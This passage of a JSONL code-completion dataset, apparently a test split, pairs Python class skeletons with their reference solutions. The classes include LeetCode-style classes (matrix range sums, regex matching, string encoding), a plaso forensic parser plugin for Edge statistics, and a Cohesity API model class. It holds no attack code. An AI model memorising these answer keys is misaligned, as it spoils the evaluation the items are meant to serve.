self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]"], "bodies_text": "<|body_start_0|>\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n<|end_body_1|>\n", "class_docstring": "", "class_name": "NumMatrix", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000062", "length_bytes": 1417, "license_type": "no_license", "methods": [{"docstring": ":type matrix: List[List[int]]", "name": "__init__", "signature": "def __init__(self, matrix)"}, {"docstring": "sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "name": "sumRegion", "signature": "def sumRegion(self, row1, col1, row2, col2)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_001208", "prompt": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int", "prompted_full_text": "Implement the Python class `NumMatrix` described below.\n\nClass description:\nImplement the NumMatrix class.\n\nMethod signatures and docstrings:\n- def __init__(self, matrix): :type matrix: List[List[int]]\n- def sumRegion(self, row1, col1, row2, col2): sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\n\n<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n<|end_body_0|>\n\n<|body_start_1|>\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n<|end_body_1|>\n", "revision_id": "4599634f31d78a0372cf0ff6fb7935d054d5ecb5", "skeleton": "<|skeleton|>\nclass NumMatrix:\n\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n <|body_0|>\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NumMatrix:\n def __init__(self, matrix):\n \"\"\":type matrix: List[List[int]]\"\"\"\n self.matrix = matrix\n row = len(matrix)\n if row:\n col = len(matrix[0])\n for i in range(0, row):\n for j in range(0, col):\n if i > 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i - 1][j] + matrix[i][j] - matrix[i - 1][j - 1]\n if i == 0 and j > 0:\n matrix[i][j] = matrix[i][j - 1] + matrix[i][j]\n elif j == 0 and i > 0:\n matrix[i][j] = matrix[i - 1][j] + matrix[i][j]\n self.matrix = matrix\n\n def sumRegion(self, row1, col1, row2, col2):\n \"\"\"sum of elements matrix[(row1,col1)..(row2,col2)], inclusive. :type row1: int :type col1: int :type row2: int :type col2: int :rtype: int\"\"\"\n if not self.matrix:\n return 0\n if row1 == 0 and col1 == 0:\n return self.matrix[row2][col2]\n if row1 == 0:\n return self.matrix[row2][col2] - self.matrix[row2][col1 - 1]\n if col1 == 0:\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2]\n return self.matrix[row2][col2] - self.matrix[row1 - 1][col2] - self.matrix[row2][col1 - 1] + self.matrix[row1 - 1][col1 - 1]\n", "source": "the_stack_v2_python_sparse", "source_path": "medium/range_sum_query_2d.py", "source_repo": "jhgdike/leetCode", "split": "test", "star_events_count": 3} {"blob_id": "93d0667bffb15dcd26766440ea7a204f309186ab", "bodies": ["m, n = (len(s), len(p))\ndp = [[0] * (n + 1) for _ in range(m + 1)]\ns = ' ' + s\np = ' ' + p\ndp[0][0] = 1\nfor i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\nreturn dp[m][n] == 1", "import re\nvalue = re.match(p, s)\nif value == None or value.group(0) != s:\n return False\nelse:\n return True"], "bodies_text": "<|body_start_0|>\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n<|end_body_0|>\n\n<|body_start_1|>\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n <|body_0|>\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n<|end_body_0|>\n\n<|body_start_1|>\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000063", "length_bytes": 2903, "license_type": "no_license", "methods": [{"docstring": ":type s: str :type p: str :rtype: bool", "name": "isMatch", "signature": "def isMatch(self, s, p)"}, {"docstring": "直接使用re :param s: :param p: :return:", "name": "isMatch2", "signature": "def isMatch2(self, s, p)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isMatch(self, s, p): :type s: str :type p: str :rtype: bool\n- def isMatch2(self, s, p): 直接使用re :param s: :param p: :return:", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def isMatch(self, s, p): :type s: str :type p: str :rtype: bool\n- def isMatch2(self, s, p): 直接使用re :param s: :param p: :return:\n\n<|skeleton|>\nclass Solution:\n\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n <|body_0|>\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n<|end_body_0|>\n\n<|body_start_1|>\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n<|end_body_1|>\n", "revision_id": "5d3574ccd282d0146c83c286ae28d8baaabd4910", "skeleton": "<|skeleton|>\nclass Solution:\n\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n <|body_0|>\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def isMatch(self, s, p):\n \"\"\":type s: str :type p: str :rtype: bool\"\"\"\n m, n = (len(s), len(p))\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n s = ' ' + s\n p = ' ' + p\n dp[0][0] = 1\n for i in range(0, m + 1):\n for j in range(1, n + 1):\n if i > 0 and (s[i] == p[j] or p[j] == '.'):\n dp[i][j] = dp[i - 1][j - 1] | dp[i][j]\n if p[j] == '*':\n dp[i][j] = dp[i][j] | dp[i][j - 2]\n if i > 0 and (s[i] == p[j - 1] or p[j - 1] == '.'):\n print(i, j, dp[i - 1][j - 2])\n dp[i][j] = dp[i][j] | dp[i - 1][j] | dp[i - 1][j - 2]\n return dp[m][n] == 1\n\n def isMatch2(self, s, p):\n \"\"\"直接使用re :param s: :param p: :return:\"\"\"\n import re\n value = re.match(p, s)\n if value == None or value.group(0) != s:\n return False\n else:\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "10_ 正则表达式匹配.py", "source_repo": "lovehhf/LeetCode", "split": "test", "star_events_count": 0} {"blob_id": "b94392c9c6547415326d80ff0923cb8ba9251783", "bodies": ["s = ''\nfor i in strs:\n s += str(len(i)) + '#' + i\nreturn s", "i, str = (0, [])\nwhile i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\nreturn str"], "bodies_text": "<|body_start_0|>\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\"\"\"\n <|body_0|>\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. :type s: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000064", "length_bytes": 2992, "license_type": "no_license", "methods": [{"docstring": "Encodes a list of strings to a single string. :type strs: List[str] :rtype: str", "name": "encode", "signature": "def encode(self, strs)"}, {"docstring": "Decodes a single string to a list of strings. :type s: str :rtype: List[str]", "name": "decode", "signature": "def decode(self, s)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006708", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def encode(self, strs): Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\n- def decode(self, s): Decodes a single string to a list of strings. :type s: str :rtype: List[str]", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def encode(self, strs): Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\n- def decode(self, s): Decodes a single string to a list of strings. :type s: str :rtype: List[str]\n\n<|skeleton|>\nclass Codec:\n\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\"\"\"\n <|body_0|>\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. :type s: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n<|end_body_0|>\n\n<|body_start_1|>\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n<|end_body_1|>\n", "revision_id": "05e8f5a4e39d448eb333c813093fc7c1df4fc05e", "skeleton": "<|skeleton|>\nclass Codec:\n\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\"\"\"\n <|body_0|>\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. :type s: str :rtype: List[str]\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def encode(self, strs):\n \"\"\"Encodes a list of strings to a single string. :type strs: List[str] :rtype: str\"\"\"\n s = ''\n for i in strs:\n s += str(len(i)) + '#' + i\n return s\n\n def decode(self, s):\n \"\"\"Decodes a single string to a list of strings. :type s: str :rtype: List[str]\"\"\"\n i, str = (0, [])\n while i < len(s):\n sharp = s.find('#', i)\n l = int(s[i:sharp])\n str.append(s[sharp + 1:sharp + l + 1])\n i = sharp + l + 1\n return str\n", "source": "the_stack_v2_python_sparse", "source_path": "leetcode_python/String/encode-and-decode-strings.py", "source_repo": "DataEngDev/CS_basics", "split": "test", "star_events_count": 0} {"blob_id": "d73b6f6562be46bd81d441c08eb73cbe2720ea9f", "bodies": ["timestamp = self._GetRowValue(query_hash, row, value_name)\nif timestamp is None:\n return None\nreturn dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)", "query_hash = hash(query)\nevent_data = EdgeLoadStatisticsResourceEventData()\nevent_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\nevent_data.query = query\nevent_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\nevent_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\nevent_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\nparser_mediator.ProduceEventData(event_data)"], "bodies_text": "<|body_start_0|>\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n<|end_body_0|>\n\n<|body_start_1|>\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n<|end_body_1|>\n", "class_docstring": "SQLite parser plugin for Microsoft Edge load statistics database.", "class_name": "EdgeLoadStatisticsPlugin", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n <|body_0|>\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n<|end_body_0|>\n\n<|body_start_1|>\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000065", "length_bytes": 4267, "license_type": "permissive", "methods": [{"docstring": "Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.", "name": "_GetWebKitDateTimeRowValue", "signature": "def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name)"}, {"docstring": "Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.", "name": "ParseResourceRow", "signature": "def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs)"}], "n_methods": 2, "prompt": "Implement the Python class `EdgeLoadStatisticsPlugin` described below.\n\nClass description:\nSQLite parser plugin for Microsoft Edge load statistics database.\n\nMethod signatures and docstrings:\n- def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name): Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\n- def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs): Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.", "prompted_full_text": "Implement the Python class `EdgeLoadStatisticsPlugin` described below.\n\nClass description:\nSQLite parser plugin for Microsoft Edge load statistics database.\n\nMethod signatures and docstrings:\n- def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name): Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\n- def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs): Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\n\n<|skeleton|>\nclass EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n <|body_0|>\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n<|end_body_0|>\n\n<|body_start_1|>\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n<|end_body_1|>\n", "revision_id": "d6022f8cfebfddf2d08ab2d300a41b61f3349933", "skeleton": "<|skeleton|>\nclass EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n <|body_0|>\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class EdgeLoadStatisticsPlugin:\n \"\"\"SQLite parser plugin for Microsoft Edge load statistics database.\"\"\"\n\n def _GetWebKitDateTimeRowValue(self, query_hash, row, value_name):\n \"\"\"Retrieves a WebKit date and time value from the row. Args: query_hash (int): hash of the query, that uniquely identifies the query that produced the row. row (sqlite3.Row): row. value_name (str): name of the value. Returns: dfdatetime.WebKitTime: date and time value or None if not available.\"\"\"\n timestamp = self._GetRowValue(query_hash, row, value_name)\n if timestamp is None:\n return None\n return dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)\n\n def ParseResourceRow(self, parser_mediator, query, row, **unused_kwargs):\n \"\"\"Parses a row from the database. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. query (str): query that created the row. row (sqlite3.Row): row resulting from query.\"\"\"\n query_hash = hash(query)\n event_data = EdgeLoadStatisticsResourceEventData()\n event_data.last_update = self._GetWebKitDateTimeRowValue(query_hash, row, 'last_update')\n event_data.query = query\n event_data.resource_hostname = self._GetRowValue(query_hash, row, 'resource_hostname')\n event_data.resource_type = self._GetRowValue(query_hash, row, 'resource_type')\n event_data.top_level_hostname = self._GetRowValue(query_hash, row, 'top_level_hostname')\n parser_mediator.ProduceEventData(event_data)\n", "source": "the_stack_v2_python_sparse", "source_path": "plaso/parsers/sqlite_plugins/edge_load_statistics.py", "source_repo": "log2timeline/plaso", "split": "test", "star_events_count": 1506} {"blob_id": "471b6c5d618d82dbd364029b6b42337c010eb8ed", "bodies": ["self.num_logical_bytes_transferred = num_logical_bytes_transferred\nself.num_physical_bytes_transferred = num_physical_bytes_transferred\nself.task_name = task_name\nself.task_type = task_type", "if dictionary is None:\n return None\nnum_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\nnum_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\ntask_name = dictionary.get('taskName')\ntask_type = dictionary.get('taskType')\nreturn cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)"], "bodies_text": "<|body_start_0|>\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, num_physical_bytes_transferred, task_name, task_type)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.", "class_name": "DataTransferFromVaultPerTask", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataTransferFromVaultPerTask:\n \"\"\"Implementation of the 'DataTransferFromVaultPerTask' model. Specifies statistics about the transfer of data from a Vault (External Target) to this Cohesity Cluster for a recover or clone task. Attributes: num_logical_bytes_transferred (long|int): Specifies the total number of logical bytes that are transferred from this Vault to the Cohesity Cluster for this task. The logical size is when the data is fully hydrated or expanded. num_physical_bytes_transferred (long|int): Specifies the total number of physical bytes that are transferred from this Vault to the Cohesity Cluster for this task. task_name (string): Specifies the task name. task_type (string): Specifies the task type.\"\"\"\n\n def __init__(self, num_logical_bytes_transferred=None, num_physical_bytes_transferred=None, task_name=None, task_type=None):\n \"\"\"Constructor for the DataTransferFromVaultPerTask class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.num_logical_bytes_transferred = num_logical_bytes_transferred\n self.num_physical_bytes_transferred = num_physical_bytes_transferred\n self.task_name = task_name\n self.task_type = task_type\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n num_logical_bytes_transferred = dictionary.get('numLogicalBytesTransferred')\n num_physical_bytes_transferred = dictionary.get('numPhysicalBytesTransferred')\n task_name = dictionary.get('taskName')\n task_type = dictionary.get('taskType')\n return cls(num_logical_bytes_transferred, 